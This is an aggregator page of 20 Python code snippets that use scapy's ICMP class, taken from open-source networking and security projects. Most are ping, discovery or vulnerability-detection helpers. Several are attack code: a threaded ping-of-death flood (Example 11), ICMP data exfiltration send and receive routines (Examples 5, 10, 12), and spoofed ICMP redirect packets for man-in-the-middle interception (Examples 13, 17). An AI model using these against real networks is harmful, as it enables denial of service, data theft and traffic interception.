Python scapy.all.ICMP Examples
The following are 20
code examples of scapy.all.ICMP().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
scapy.all
, or try the search function
.
.
Example #1
| Source File: 3_7_detect_inactive_machines.py From Python-Network-Programming-Cookbook-Second-Edition with MIT License | 7 votes |
|
def detect_inactive_hosts(scan_hosts):
"""
Scans the network to find scan_hosts are live or dead
scan_hosts can be like 10.0.2.2-4 to cover range.
See Scapy docs for specifying targets.
"""
global scheduler
scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, ))
inactive_hosts = []
try:
ans, unans = sr(IP(dst=scan_hosts)/ICMP(), retry=0, timeout=1)
ans.summary(lambda r : r.sprintf("%IP.src% is alive"))
for inactive in unans:
print ("%s is inactive" %inactive.dst)
inactive_hosts.append(inactive.dst)
print ("Total %d hosts are inactive" %(len(inactive_hosts)))
except KeyboardInterrupt:
exit(0)
Example #2
| Source File: quic_tester.py From cotopaxi with GNU General Public License v2.0 | 6 votes |
|
def ping(test_params, show_result=False):
ping_packets = [QUIC_PING_000, QUIC_PING_001]
for ping_packet in ping_packets:
ping_data = ping_packet.decode("hex")
response = udp_sr1(test_params, ping_data)
if not response:
continue
if ICMP in response and response[ICMP].type == 3:
print_verbose(test_params, "Received ICMP dest-unreachable")
continue
if 50 < len(response) < 70 or 1000 < len(response) < 2000:
return True
else:
print ("Received unknown message len: {}".format(len(response)))
# parsed_response = scrap_response(test_params, response)
# if check_dtls_response(test_params, parsed_response):
# return True
return False
Example #3
| Source File: quic_utils.py From cotopaxi with GNU General Public License v2.0 | 6 votes |
|
def ping(test_params, show_result=False):
"""Check whether QUIC server is responding."""
if not test_params:
return None
ping_packets = [QUIC_PING_000, QUIC_PING_001]
for ping_packet in ping_packets:
ping_data = ping_packet.decode("hex")
response = udp_sr1(test_params, ping_data)
if not response:
continue
if ICMP in response and response[ICMP].type == 3:
print_verbose(test_params, "Received ICMP dest-unreachable")
continue
if 50 < len(response) < 70 or 1000 < len(response) < 2000:
return True
else:
print ("Received unknown message len: {}".format(len(response)))
# parsed_response = scrap_response(test_params, response)
# if check_dtls_response(test_params, parsed_response):
# return True
return False
Example #4
| Source File: 13_7_detect_inactive_machines.py From Python-Network-Programming with MIT License | 6 votes |
|
def detect_inactive_hosts(scan_hosts):
"""
Scans the network to find scan_hosts are live or dead
scan_hosts can be like 10.0.2.2-4 to cover range.
See Scapy docs for specifying targets.
"""
global scheduler
scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, ))
inactive_hosts = []
try:
ans, unans = sr(IP(dst=scan_hosts)/ICMP(), retry=0, timeout=1)
ans.summary(lambda r : r.sprintf("%IP.src% is alive"))
for inactive in unans:
print ("%s is inactive" %inactive.dst)
inactive_hosts.append(inactive.dst)
print ("Total %d hosts are inactive" %(len(inactive_hosts)))
except KeyboardInterrupt:
exit(0)
Example #5
| Source File: icmp.py From DET with MIT License | 5 votes |
|
def listen():
app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
# Filter for echo requests only to prevent capturing generated replies
scapy.sniff(filter="icmp and icmp[0]=8", prn=analyze)
Example #6
| Source File: arp.py From kube-hunter with Apache License 2.0 | 5 votes |
|
def execute(self):
config = get_config()
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.network_timeout, verbose=0,
)
# arp enabled on cluster and more than one pod on node
if len(arp_responses) > 1:
# L3 plugin not installed
if not self.detect_l3_on_host(arp_responses):
self.publish_event(PossibleArpSpoofing())
Example #7
| Source File: dns.py From kube-hunter with Apache License 2.0 | 5 votes |
|
def execute(self):
config = get_config()
logger.debug("Attempting to get kube-dns pod ip")
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.netork_timeout)[IP].dst
cbr0_ip, cbr0_mac = self.get_cbr0_ip_mac()
kubedns = self.get_kube_dns_ip_mac()
if kubedns:
kubedns_ip, kubedns_mac = kubedns
logger.debug(f"ip={self_ip} kubednsip={kubedns_ip} cbr0ip={cbr0_ip}")
if kubedns_mac != cbr0_mac:
# if self pod in the same subnet as kube-dns pod
self.publish_event(PossibleDnsSpoofing(kubedns_pod_ip=kubedns_ip))
else:
logger.debug("Could not get kubedns identity")
Example #8
| Source File: dns.py From kube-hunter with Apache License 2.0 | 5 votes |
|
def get_cbr0_ip_mac(self):
config = get_config()
res = srp1(Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)
return res[IP].src, res.src
Example #9
| Source File: hosts.py From kube-hunter with Apache License 2.0 | 5 votes |
|
def traceroute_discovery(self):
config = get_config()
node_internal_ip = srp1(
Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout,
)[IP].src
return [[node_internal_ip, "24"]]
# querying azure's interface metadata api | works only from a pod
Example #10
| Source File: icmp.py From DET with MIT License | 5 votes |
|
def analyze(packet):
src = packet.payload.src
dst = packet.payload.dst
try:
app_exfiltrate.log_message(
'info', "[icmp] Received ICMP packet from: {0} to {1}".format(src, dst))
app_exfiltrate.retrieve_data(base64.b64decode(packet.load))
except:
pass
Example #11
| Source File: pod.py From quack with MIT License | 5 votes |
|
def POD_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting POD attack...")
threads_list = []
# POD flood
def pod_flood():
global FINISH
payload = random.choice(list("1234567890qwertyuiopasdfghjklzxcvbnm")) * 60000
packet = IP(dst = target_ip) / ICMP(id = 65535, seq = 65535) / payload
while not FINISH:
for i in range(16):
send(packet, verbose = False)
print("\033[1;32m"+"[+]"+"\033[0m"+" Packet was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = pod_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
Example #12
| Source File: icmp.py From DET with MIT License | 5 votes |
|
def send(data):
data = base64.b64encode(data)
app_exfiltrate.log_message(
'info', "[icmp] Sending {} bytes with ICMP packet".format(len(data)))
scapy.sendp(scapy.Ether() /
scapy.IP(dst=config['target']) / scapy.ICMP() / data, verbose=0)
Example #13
| Source File: ICMP.py From MITMf with GNU General Public License v3.0 | 5 votes |
|
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
Example #14
| Source File: flooder_utility.py From pentesting-multitool with GNU General Public License v3.0 | 5 votes |
|
def generator(self, n, filename):
time = 0.00114108 * n + 0.157758
minutes = time/60
print('Generating packets, it will take %s seconds, moreless (%s, minutes)' % (time, minutes))
pkgs = [IP(dst='10.0.0.1')/ICMP() for i in range(n)]
wrpcap(filename, pkgs)
print('%s packets generated.' % (n))
Example #15
| Source File: urgent11_detector.py From urgent11-detector with GNU Affero General Public License v3.0 | 5 votes |
|
def detect(self, dst_port):
pkt = IP(dst=self._target) / ICMP(ICMP_TIMESTAMP_REQUEST_TRUNCATED)
response = sr1(pkt, verbose=False, timeout=CFG_PACKET_TIMEOUT)
if response is None:
self.ipnet_score = 0
elif response['ICMP'].type == ICMP_TIMESTAMP_REPLY:
self.ipnet_score = 90
else:
self.ipnet_score = -30
# CLI Logic
Example #16
| Source File: urgent11_detector.py From urgent11-detector with GNU Affero General Public License v3.0 | 5 votes |
|
def detect(self, dst_port):
pkt = IP(dst=self._target) / ICMP(type=ICMP_ECHO_REQUEST, code=0x41)
response = sr1(pkt, verbose=False, timeout=CFG_PACKET_TIMEOUT)
if response is None:
self.ipnet_score = 0
elif response['ICMP'].code == 0:
self.ipnet_score = 20
else:
self.ipnet_score = -20
Example #17
| Source File: ICMP.py From piSociEty with GNU General Public License v3.0 | 5 votes |
|
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
Example #18
| Source File: carpa.py From circo with MIT License | 5 votes |
|
def pkt_callback(self, pkt):
"""
Process PING packets
"""
if pkt[ICMP].type == 8:
if pkt[IP].id >= 200 and pkt[IP].id < 300:
self.pktlen = pkt[IP].id - 200
elif pkt[IP].id >= 300 and pkt[IP].id < 400:
self.pkttotal = pkt[IP].id - 300
elif pkt[IP].id >= 500 and pkt[IP].id < 600:
self.dic[pkt[IP].id - 500] = '{:04x}'.format(pkt[ICMP].seq)
elif pkt[IP].id == 666:
if DEBUG:
print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
+ 'PING:' + pkt[IP].src + ':ALARM Case Open!')
if len(self.dic) == self.pkttotal:
odic = collections.OrderedDict(sorted(self.dic.items()))
final = ''
for value in odic.iteritems():
final = final + value[1]
text = decrypt(final[:self.pktlen])
text = text.strip()
hexip = text.split(',')[-1]
text = text.replace(hexip, hextoip(hexip))
text = 'PING:' + pkt[IP].src + ':' + text
printer(self.filed, text)
self.dic = {}
self.pkttotal = 200
Example #19
| Source File: cmd_icmp_ping.py From habu with BSD 3-Clause "New" or "Revised" License | 4 votes |
|
def cmd_icmp_ping(ip, interface, count, timeout, wait, verbose):
"""The classic ping tool that send ICMP echo requests.
\b
# habu.icmp.ping 8.8.8.8
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
"""
if interface:
conf.iface = interface
conf.verb = False
conf.L3socket=L3RawSocket
layer3 = IP()
layer3.dst = ip
layer3.tos = 0
layer3.id = 1
layer3.flags = 0
layer3.frag = 0
layer3.ttl = 64
layer3.proto = 1 # icmp
layer4 = ICMP()
layer4.type = 8 # echo-request
layer4.code = 0
layer4.id = 0
layer4.seq = 0
pkt = layer3 / layer4
counter = 0
while True:
ans = sr1(pkt, timeout=timeout)
if ans:
if verbose:
ans.show()
else:
print(ans.summary())
del(ans)
else:
print('Timeout')
counter += 1
if count != 0 and counter == count:
break
sleep(wait)
return True
Example #20
| Source File: cmd_gateway_find.py From habu with BSD 3-Clause "New" or "Revised" License | 4 votes |
|
def cmd_gateway_find(network, iface, host, tcp, dport, timeout, verbose):
"""
Try to reach an external IP using any host has a router.
Useful to find routers in your network.
First, uses arping to detect alive hosts and obtain MAC addresses.
Later, create a network packet and put each MAC address as destination.
Last, print the devices that forwarded correctly the packets.
Example:
\b
# habu.find.gateway 192.168.0.0/24
192.168.0.1 a4:08:f5:19:17:a4 Sagemcom
192.168.0.7 b0:98:2b:5d:22:70 Sagemcom
192.168.0.8 b0:98:2b:5d:1f:e8 Sagemcom
"""
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface))
return False
res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=network), timeout=2)
neighbors = set()
for _, pkt in res:
neighbors.add((pkt['Ether'].src, pkt['Ether'].psrc))
for mac,ip in neighbors:
if tcp:
res, unans = srp(Ether(dst=mac)/IP(dst=host)/TCP(dport=dport), timeout=timeout)
else:
res, unans = srp(Ether(dst=mac)/IP(dst=host)/ICMP(), timeout=timeout)
for _,pkt in res:
if pkt:
if verbose:
print(pkt.show())
else:
print(ip, mac, conf.manufdb._get_manuf(mac))
